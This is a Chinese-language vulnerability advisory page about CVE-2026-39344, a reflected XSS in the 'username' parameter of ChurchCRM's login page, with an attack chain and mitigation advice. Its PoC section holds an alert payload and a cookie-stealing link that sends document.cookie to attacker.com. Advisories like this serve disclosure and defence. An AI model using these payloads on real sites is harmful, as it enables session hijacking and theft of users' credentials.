IPBUF安全漏洞报告
English
CVE-2026-39344 CVSS 8.1 高危

CVE-2026-39344 ChurchCRM登录页反射型XSS漏洞

披露日期: 2026-04-07

漏洞信息

漏洞编号
CVE-2026-39344
漏洞类型
反射型跨站脚本 (XSS)
CVSS评分
8.1 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
ChurchCRM

相关标签

XSS反射型XSSChurchCRM跨站脚本Web漏洞

漏洞概述

ChurchCRM是一款开源教会管理系统。在7.1.0版本之前,其登录页面存在一个反射型跨站脚本(XSS)漏洞。该漏洞源于未对URL中接收的“username”参数进行适当的清理或编码。攻击者可以通过构造恶意URL,将JavaScript代码注入到登录页面的输入框中,当受害者点击链接时,恶意脚本将在客户端执行,可能导致会话Cookie被窃取或页面显示被篡改。该漏洞已在7.1.0版本中修复。

技术细节

该漏洞属于反射型XSS,出现在ChurchCRM登录页面的参数处理逻辑中。当用户访问带有特定“username”参数的登录URL时,后端应用直接将参数值回显到登录表单用户名输入框的value属性中,且未进行HTML实体编码或输入过滤。由于攻击向量为网络(AV:N)且无需认证(PR:N),攻击者可诱导受害者访问精心构造的恶意链接。虽然需要用户交互(UI:R),但一旦受害者加载页面,嵌入的JavaScript代码便会在其浏览器上下文中执行。利用此漏洞,攻击者可窃取Session ID劫持会话,或通过伪造登录框实施钓鱼攻击,严重威胁机密性与完整性。

攻击链分析

STEP 1
步骤1
攻击者识别出目标网站使用的是存在漏洞的ChurchCRM系统(版本 < 7.1.0)。
STEP 2
步骤2
攻击者构造一个特制的URL,在“username”参数中注入恶意的JavaScript代码,例如窃取Cookie的脚本。
STEP 3
步骤3
攻击者通过电子邮件、即时通讯或其他社会工程学手段,将恶意链接发送给目标用户。
STEP 4
步骤4
目标用户被诱导点击链接,浏览器向ChurchCRM服务器发送请求。
STEP 5
步骤5
服务器接收请求,未对“username”参数进行过滤,直接将其嵌入到登录页面的HTML响应中。
STEP 6
步骤6
目标用户的浏览器解析响应页面,执行注入的恶意脚本。
STEP 7
步骤7
恶意脚本将用户的敏感信息(如Session Cookie)发送到攻击者控制的服务器。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- Proof of Concept for Reflected XSS in ChurchCRM --> <!-- Usage: Access the login page with the username parameter containing the payload --> <!-- Example URL: http://target/login.php?username="><script>alert(document.cookie)</script> --> <html> <body> <h3>Vulnerable Endpoint Test</h3> <p>The application reflects the 'username' parameter without sanitization in the login form.</p> <a href="http://target-domain.com/login.php?username=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E"> Click to Trigger XSS (Alert) </a> <br><br> <p>Stealing Cookie Payload:</p> <a href="http://target-domain.com/login.php?username=%22%3E%3Cscript%3Efetch%28%27http%3A%2F%2Fattacker.com%2F%3Fc%3D%27%2Bdocument.cookie%29%3B%3C%2Fscript%3E"> Click to Steal Cookie </a> </body> </html>

影响范围

ChurchCRM < 7.1.0

防御指南

临时缓解措施
建议立即升级至安全版本。若无法升级,应在系统前端部署WAF过滤恶意字符,并对所有输出到页面的变量进行转义处理。同时,加强用户安全意识教育,警惕不明链接。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表